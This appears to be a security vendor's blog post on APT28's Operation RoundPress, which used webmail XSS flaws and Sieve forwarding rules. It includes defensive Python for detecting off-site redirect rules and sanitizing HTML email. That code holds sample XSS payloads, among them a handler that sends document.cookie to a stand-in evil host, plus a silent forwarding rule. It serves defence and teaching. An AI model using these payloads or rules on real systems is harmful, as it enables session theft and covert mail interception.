A major wave of cyber espionage campaigns has once again brought the spotlight onto outdated and vulnerable webmail servers across the globe. Dubbed Operation RoundPress, the campaign is believed to be the work of APT28, a Russian state-sponsored threat actor known by many names such as Fancy Bear, Sednit, TA422, and Forest Blizzard. According to cybersecurity firm ESET, this sophisticated operation has been ongoing since 2023 and continues to exploit security flaws in popular webmail platforms like Roundcube, Horde, Zimbra, and MDaemon.
APT28’s objective? To infiltrate sensitive government and defense networks, steal confidential emails, and exfiltrate user credentials, all without leaving a visible trace.
Unpacking Operation RoundPress
The attackers exploited cross-site scripting (XSS) vulnerabilities in webmail clients to deliver SpyPress, a JavaScript payload designed to steal webmail credentials, address books, and entire email conversations. The payload is embedded in the body of an email: as soon as the victim opens that email in a vulnerable webmail client, the script runs in the victim’s browser, inside the webmail application and with the victim’s already authenticated session, so it can read and send out whatever the user’s own session can reach in the mailbox.
In some cases, particularly with Roundcube, SpyPress went further and created Sieve rules that forward every incoming email to an attacker-controlled address. Because Sieve rules are filters stored and applied on the mail server, this forwarding persists even after the malicious email has been deleted or the script has stopped running.
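A check a defender would want for the persistence step just described (an added example, not ESET’s code or Roundcube’s): the rules a webmail client creates through ManageSieve end up as a Sieve script on the mail server, so those scripts can be scanned for redirect actions that send mail to domains the organization does not own. The small tokenizer, the sample script, the trusted domain and the comment claiming a rule was injected are all constructed for this demo; the one real Sieve detail it leans on is that redirect :copy leaves the original message in the mailbox, so the victim sees nothing missing.

```python
"""Added example: find Sieve redirect rules that forward mail off-site.

Illustrative detection logic, not code from ESET or any webmail project.
SAMPLE_SIEVE, the trusted domain and the comment about an injected rule
are constructed for the demo.
"""
import re

# Minimal Sieve tokenizer: comments, quoted strings, :tags, identifiers,
# punctuation.  Trying 'comment' and 'string' first means a '#' inside a
# quoted string is not mistaken for a comment.
_TOKEN_RE = re.compile(r'''
    (?P<comment>\#[^\n]*|/\*.*?\*/)
  | (?P<string>"(?:[^"\\]|\\.)*")
  | (?P<tag>:[A-Za-z_][A-Za-z0-9_]*)
  | (?P<ident>[A-Za-z_][A-Za-z0-9_]*)
  | (?P<punct>[{}\[\],;()])
  | (?P<ws>\s+)
  | (?P<other>.)
''', re.S | re.X)


def _tokens(script):
    """Yield (kind, text, offset), dropping comments and whitespace."""
    for m in _TOKEN_RE.finditer(script):
        kind = m.lastgroup
        if kind in ("comment", "ws"):
            continue
        yield kind, m.group(), m.start()


def _unquote(s):
    """Strip the surrounding quotes and undo backslash escapes."""
    return re.sub(r"\\(.)", r"\1", s[1:-1])


def find_external_redirects(script, trusted_domains):
    """Return every redirect whose target domain is not in trusted_domains.

    Each finding records the address, the line it appears on, whether the
    rule uses :copy (the victim keeps seeing the mail, so nothing looks
    wrong) and whether it sits outside any if-block (applies to all mail).
    """
    trusted = {d.lower() for d in trusted_domains}
    findings = []
    depth = 0  # brace depth; 0 means the action is unconditional
    toks = list(_tokens(script))
    i = 0
    while i < len(toks):
        kind, text, pos = toks[i]
        if kind == "punct" and text == "{":
            depth += 1
        elif kind == "punct" and text == "}":
            depth -= 1
        elif kind == "ident" and text.lower() == "redirect":
            copy, addresses = False, []
            j = i + 1
            while j < len(toks) and toks[j][1] != ";":  # consume the command
                k, t, _ = toks[j]
                if k == "tag" and t.lower() == ":copy":
                    copy = True
                elif k == "string":
                    addresses.append(_unquote(t))
                j += 1
            for addr in addresses:
                domain = addr.rpartition("@")[2].lower()
                if domain not in trusted:
                    findings.append({
                        "address": addr,
                        "line": script.count("\n", 0, pos) + 1,
                        "copy": copy,
                        "unconditional": depth == 0,
                    })
            i = j
        i += 1
    return findings


# Constructed sample: one legitimate user rule followed by two forwarding
# rules, one of them unconditional and silent (:copy).
SAMPLE_SIEVE = r'''require ["fileinto", "copy"];
# Legitimate user rule
if header :contains "subject" "newsletter" {
    fileinto "INBOX/Newsletters";
}
/* rule added later through the webmail's ManageSieve interface */
redirect :copy "collector@example.net";
if address :is "from" "director@example.gov" {
    redirect "archive@example.gov";
    redirect "drop@example.org";
}
'''

if __name__ == "__main__":
    for f in find_external_redirects(SAMPLE_SIEVE, {"example.gov"}):
        flags = ("copy " if f["copy"] else "") + ("ALL MAIL" if f["unconditional"] else "conditional")
        print(f"line {f['line']}: redirect to {f['address']} ({flags})")
```

Where the scripts live depends on the deployment (for Dovecot’s Pigeonhole they are typically files in each user’s mail home; other backends keep them in a database), so the loop over users is left to the operator; the useful signal is any redirect to a domain outside the organization, and an unconditional :copy redirect is the shape of the behaviour described above.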
While vulnerabilities such as CVE-2023-43770 (Roundcube) and CVE-2024-27443 (Zimbra) had been publicly disclosed and patched before they were used in this campaign, ESET found that the MDaemon vulnerability (CVE-2024-11182) was exploited as a zero-day, that is, before any patch was available. The campaign thus illustrates the persistent gap between a fix being released and that fix actually being deployed.
Who’s Being Targeted?
The majority of the targets are governmental entities and defense contractors in Eastern Europe, especially those aiding Ukraine. Organizations in Bulgaria, Romania, Greece, Serbia, and Cyprus have been hit, as have others farther afield in Cameroon, Ecuador, and elsewhere. The victims include military, government, and academic institutions, a broad geographic and sectoral reach.
APT28’s repeated focus on email systems is not new. Since at least 2020, this group and others such as GreenCube and Winter Vivern have been exploiting flaws in Roundcube and similar platforms. Their preference for XSS attacks stems from simplicity: one email is all it takes, and the victim does not have to download an attachment or click a link, only view the message.
Why Webmail Servers Are a Goldmine for Attackers
Email remains a vital communication medium for most organizations, especially in sectors like defense, government, academia, and critical infrastructure. However, many entities fail to regularly patch or update their webmail software, leaving old vulnerabilities open for exploitation.
XSS-based attacks like those seen in Operation RoundPress are especially dangerous because the trigger arrives remotely by email and the payload executes silently in the victim’s browser, as part of the webmail application itself, so it inherits the user’s logged-in session. Attackers can therefore steal credentials and confidential communication without deploying malware on the endpoint or doing anything the user would notice.
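Both this section and the description of SpyPress under “Unpacking Operation RoundPress” come down to one control: a webmail client renders attacker-supplied HTML, so whatever rewrites a message body before the browser sees it decides whether script can run. The following is an added illustration, not code from ESET, Roundcube, Horde, Zimbra or MDaemon, and it does not reproduce any RoundPress payload. It contrasts a blocklist filter (strip script elements and hope) with an allowlist rebuild of the document; the allowed tags, allowed attributes, URL schemes and the sample payloads are assumptions chosen for the demo.

```python
"""Added example: blocklist vs allowlist sanitization of HTML email bodies.

Illustrative only; not code from ESET or any webmail project.  The tag and
attribute allowlists and the payloads in the usage section are assumptions
constructed for the demo.
"""
import html
import re
from html.parser import HTMLParser

# --- Approach 1: blocklist. Removes <script> elements and nothing else. ---
_SCRIPT_RE = re.compile(r"<\s*script\b[^>]*>.*?<\s*/\s*script\s*>", re.I | re.S)


def sanitize_blocklist(body: str) -> str:
    """Bypassable: inline event handlers and javascript: URLs survive."""
    return _SCRIPT_RE.sub("", body)


# --- Approach 2: allowlist. Rebuild the document from known-safe parts. ---
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "div", "span", "table", "tr", "td", "th", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
                 "td": {"colspan"}, "th": {"colspan"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = ("http://", "https://", "mailto:", "cid:")
VOID_TAGS = {"br", "img"}
# Elements whose entire content is dropped, not just the tag itself.
DROP_CONTENT = {"script", "style", "iframe", "object", "embed", "svg", "math",
                "noscript", "noembed", "template"}


def _safe_url(value: str) -> bool:
    # Remove whitespace/control characters used to split "javascript:"
    # ("jav\tascript:") so a scheme check is not fooled; html.parser has
    # already decoded entities such as &#x09; by the time we get here.
    compact = re.sub(r"[\s\x00-\x1f]+", "", value).lower()
    return compact.startswith(SAFE_SCHEMES)


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.stack = []      # allowed elements currently open, for re-balancing
        self.drop_depth = 0  # >0 while inside a DROP_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:           # tag names arrive lower-cased
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag, keep its text (handle_data)
        parts = [tag]
        for name, value in attrs:         # attribute names are lower-cased too
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue                  # drops every on* handler, style=, ...
            if name in URL_ATTRS and not _safe_url(value):
                continue
            parts.append(f'{name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{' '.join(parts)}>")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            if self.drop_depth:
                self.drop_depth -= 1
            return
        if self.drop_depth or tag not in self.stack:
            return
        while self.stack:                 # close misnested children first
            t = self.stack.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(html.escape(data, quote=False))

    def result(self) -> str:
        self.close()
        while self.stack:                 # close anything the sender left open
            self.out.append(f"</{self.stack.pop()}>")
        return "".join(self.out)


def sanitize_allowlist(body: str) -> str:
    p = AllowlistSanitizer()
    p.feed(body)
    return p.result()


if __name__ == "__main__":
    # Constructed payloads: a handler attribute and an obfuscated javascript: URL.
    for sample in (
        "<img src=\"https://example.com/a.png\" onerror=\"fetch('https://evil.example/'+document.cookie)\">",
        '<a href="jav&#x09;ascript:alert(1)">click</a>',
        "<svg onload=alert(1)><p>hidden</p></svg>text",
    ):
        print("blocklist:", sanitize_blocklist(sample))
        print("allowlist:", sanitize_allowlist(sample))
```

The blocklist passes the first two payloads through untouched, which is the whole lesson: the set of ways to run script in a rendered message is open-ended, so a filter has to enumerate what is allowed rather than what is forbidden. A production webmail filter also needs to block remote image loads by default and ship a strict Content-Security-Policy on the webmail origin as a second layer; both are outside this demo.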
Conclusion
Operation RoundPress is a sobering reminder that email security should never be an afterthought. The success of this campaign relied not on groundbreaking malware but on exploiting known, and in some cases already patched, vulnerabilities. For organizations in defense, government, healthcare, financial services, manufacturing, and education, this incident reinforces the need for proactive security measures.
Patching webmail software promptly, training employees on phishing awareness, auditing server-side mail rules such as Sieve filters for unexpected forwarding, and deploying advanced threat detection solutions can be the difference between a secure environment and a breached inbox.
About COE Security
COE Security partners with organizations in financial services, healthcare, retail, manufacturing, and government to secure AI-powered systems and ensure compliance. Our offerings include:
- AI-enhanced threat detection and real-time monitoring
- Data governance aligned with GDPR, HIPAA, and PCI DSS
- Secure model validation to guard against adversarial attacks
- Customized training to embed AI security best practices
- Penetration Testing (Mobile, Web, AI, Product, IoT, Network & Cloud)
- Secure Software Development Consulting (SSDLC)
- Customized CyberSecurity Services
In light of campaigns like Operation RoundPress, COE Security now offers specialized services to secure email infrastructure, conduct webmail vulnerability assessments, and implement XSS mitigation strategies. We help organizations proactively identify and patch zero-day and known vulnerabilities in their communication systems to avoid being the next target.